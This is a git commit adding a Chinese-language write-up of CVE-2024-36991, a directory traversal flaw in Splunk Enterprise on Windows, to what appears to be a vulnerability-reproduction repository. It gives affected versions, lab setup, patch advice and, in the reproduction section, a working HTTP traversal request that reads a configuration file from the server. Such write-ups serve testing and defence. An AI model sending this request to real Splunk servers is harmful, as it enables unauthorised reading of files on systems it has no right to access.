update CVE-2024-36991

2025-11-05 10:50:23 +00:00 · 2025-05-12 17:45:44 +08:00 · 2025-05-12 17:45:44 +08:00 · 94ba3ac664
commit 94ba3ac664
parent c70d89cd33
5 changed files with 48 additions and 0 deletions
--- a/README.md
+++ b/README.md
@ -433,6 +433,7 @@ _Disclaimer: The technologies, concepts, and tools provided in this Git reposito
  * SonarQube search_projects 项目信息泄露漏洞
  * SonarQube values 信息泄露漏洞 CVE-2020-27986
  * SpiderFlow save 远程命令执行漏洞
+  * Splunk Enterprise Windows 平台 messaging 目录遍历漏洞 CVE-2024-36991
  * TamronOS IPTV系统 ping 任意命令执行漏洞
  * TamronOS IPTV系统 submit 任意用户创建漏洞
  * TerraMaster TOS createRaid 远程命令执行漏洞 CVE-2022-24989
--- a/Web应用漏洞/Splunk
+++ b/Web应用漏洞/Splunk
@ -0,0 +1,47 @@
+# Splunk Enterprise Windows 平台 messaging 目录遍历漏洞 CVE-2024-36991
+
+## 漏洞描述
+
+Splunk Enterprise 是一款强大的数据分析软件，它允许用户从各种来源收集、索引和搜索机器生成的数据。2024 年 7 月，官方发布安全通告，披露 CVE-2024-36991 Splunk Enterprise Windows 平台 /modules/messaging 目录遍历漏洞。漏洞仅影响 Windows 平台上的 Splunk Enterprise。
+
+参考链接：
+
+- https://advisory.splunk.com/advisories/SVD-2024-0711
+- https://research.splunk.com/application/e7c2b064-524e-4d65-8002-efce808567aa
+- https://www.sonicwall.com/blog/critical-splunk-vulnerability-cve-2024-36991-patch-now-to-prevent-arbitrary-file-reads
+
+## 漏洞影响
+
+```
+9.2.0 <= Splunk Enterprise < 9.2.2
+9.1.0 <= Splunk Enterprise < 9.1.5
+9.0.0 <= Splunk Enterprise < 9.0.10
+```
+
+## 环境搭建
+
+[官网](https://www.splunk.com/en_us/download/previous-releases.html) 下载安装 Splunk Enterprise 9.2.1，搭建完成后，访问 `your-ip:8000`，即可看到 Splunk Enterprise 的登录页面。
+
+![](images/Splunk%20Enterprise%20Windows%20平台%20messaging%20目录遍历漏洞%20CVE-2024-36991/image-20250508172300815.png)
+
+## 漏洞复现
+
+ Splunk Enterprise 中， `8000` 端口 和 `8089` 端口 分别用于 Web UI 和 后台管理 API。可以通过 `8089` 端口查看版本号：
+
+![](images/Splunk%20Enterprise%20Windows%20平台%20messaging%20目录遍历漏洞%20CVE-2024-36991/image-20250508174456478.png)
+
+通过 `8000` 端口读取配置文件 `$SPLUNK_HOME/etc/system/default/web.conf`：
+
+```
+GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/system/default/web.conf HTTP/1.1
+Host: 10.10.11.61:8000
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+```
+
+![](images/Splunk%20Enterprise%20Windows%20平台%20messaging%20目录遍历漏洞%20CVE-2024-36991/image-20250508174701876.png)
+
+## 漏洞修复
+
+官方已发布安全更新，建议升级至最新版本。
--- a/CVE-2024-36991/image-20250508172300815.png
+++ b/CVE-2024-36991/image-20250508172300815.png
--- a/CVE-2024-36991/image-20250508174456478.png
+++ b/CVE-2024-36991/image-20250508174456478.png
--- a/CVE-2024-36991/image-20250508174701876.png
+++ b/CVE-2024-36991/image-20250508174701876.png